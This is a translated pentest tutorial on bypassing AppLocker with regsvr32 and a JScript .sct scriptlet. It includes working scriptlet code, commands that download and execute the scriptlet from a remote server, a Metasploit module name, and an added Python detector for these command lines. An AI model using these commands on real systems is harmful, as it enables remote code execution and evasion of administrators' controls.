Using Regsvr32 to bypass AppLocker restriction policies

AppLocker was designed to help administrators control which Windows installer files, executables and user scripts are allowed to run. A variety of tricks have shown that these restrictions can be bypassed: for example, where AppLocker is configured in a Windows environment to restrict script execution, the regsvr32 command-line utility can be used to get around it.


regsvr32 is a Windows command-line utility for registering dynamic link library files, and for registering and unregistering controls with the system. Casey Smith discovered that invoking the regsvr32 utility to execute a command or a .sct file can bypass AppLocker's script rules. Since the utility is signed by Microsoft this brings a number of benefits: it supports TLS, follows redirects, and does not leave traces on disk.

The script below is a modified version of Casey Smith's code in which we only call calc.exe or cmd.exe. If the command prompt is permitted, the script will execute a custom binary on the target system:

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Pentest"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- scrobj.dll runs this registration script when regsvr32 calls DllInstall (/i) -->
    <script language="JScript">
    <![CDATA[
        // The backslash must be doubled inside a JScript string literal
        var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\\ & pentestlab.exe");
    ]]>
    </script>
</registration>
</scriptlet>

The regsvr32 utility can request and execute the script from a hosted web server:

regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll


regsvr32 command-line options:

  • /s  Silent mode; no message boxes are displayed
  • /n  Do not call DllRegisterServer; this option must be used together with /i
  • /i  Call DllInstall, passing it the optional [cmdline]; when used with /u it calls DllUninstall instead
  • /u  Unregister the control

Of course, regsvr32 can also be used to run a payload stored locally:

regsvr32 /u /n /s /i:payload.sct scrobj.dll

This command executes the script directly from the web server hosting the file; the JavaScript embedded in the .sct file launches pentestlab3.exe from a command prompt.

Since pentestlab3 is a Metasploit payload, a Meterpreter session is opened afterwards:

Of course, running the script directly is still blocked, but bypassing AppLocker with regsvr32 as shown above works.
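As an added example (not code from the original article or from pentestlab), the following Python flags the regsvr32 command-line shapes described above in process-creation logs, which is where a defender would look for this technique. The flattened Key=value event format, the sample events and the 192.0.2.10 address are constructed for illustration.

```python
import re

# Constructed sample events (not from the page): Sysmon-style process-creation
# records flattened to one Key=value line each. The first two mirror the
# regsvr32 invocations shown in the article; the last two are benign.
SAMPLE_EVENTS = [
    'Image=C:\\Windows\\System32\\regsvr32.exe CommandLine="regsvr32 /u /n /s /i:http://192.0.2.10:8080/payload.sct scrobj.dll"',
    'Image=C:\\Windows\\SysWOW64\\regsvr32.exe CommandLine="regsvr32 /u /n /s /i:payload.sct scrobj.dll"',
    'Image=C:\\Windows\\System32\\regsvr32.exe CommandLine="regsvr32 /s vendor.dll"',
    'Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe notes.txt"',
]

# Key=value pairs; quoted values may contain spaces (e.g. the command line).
_FIELD = re.compile(r'(\w+)=("([^"]*)"|\S+)')

def parse_event(line):
    """Parse one flattened event line into a dict of field -> value."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(2)
            for m in _FIELD.finditer(line)}

def analyze_event(line):
    """Return a finding for a suspicious regsvr32 invocation, or None."""
    ev = parse_event(line)
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image != "regsvr32.exe":
        return None
    tokens = ev.get("CommandLine", "").lower().split()
    reasons, remote = [], False
    if "scrobj.dll" in tokens:
        reasons.append("scrobj.dll loaded (COM scriptlet host rather than a normal COM DLL)")
    for t in tokens:
        if t.startswith(("/i:", "-i:")):          # DllInstall argument
            target = t[3:]
            if target.startswith(("http://", "https://")):
                remote = True
                reasons.append("scriptlet fetched over HTTP via /i:" + target)
            elif target.endswith(".sct"):
                reasons.append("local scriptlet via /i:" + target)
    if {"/u", "/n"} <= set(tokens) and any(t.startswith("/i") for t in tokens):
        reasons.append("/u /n /i combination skips DllRegisterServer (scriptlet pattern)")
    if not reasons:
        return None
    severity = "high" if remote and "scrobj.dll" in tokens else "medium"
    return {"image": ev["Image"], "severity": severity, "reasons": reasons}

def scan(lines):
    """Run analyze_event over a sequence of log lines and keep the findings."""
    return [f for f in map(analyze_event, lines) if f]
```

Legitimate regsvr32 use registers a vendor DLL without /i: pointing at a URL or .sct file, so the benign sample produces no finding.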

Metasploit

The Metasploit Framework has a specific module that automates the AppLocker bypass through the Regsvr32 utility:

exploit/windows/misc/regsvr32_applocker_bypass_server

This module starts a web server hosting the malicious .sct file and also provides the command to be executed on the target system.

Once the command runs, regsvr32 requests the .sct file from the web server and then executes the PowerShell payload.


Finally, the AppLocker restriction is bypassed.


References

https://www.rapid7.com/db/modules/exploit/windows/misc/regsvr32_applocker_bypass_server
http://subt0x10.blogspot.co.uk/2017/04/bypass-application-whitelisting-script.html

Source: pentestlab; translated by FreeBuf editor 鸢尾. Please credit FreeBuf.com when reposting.
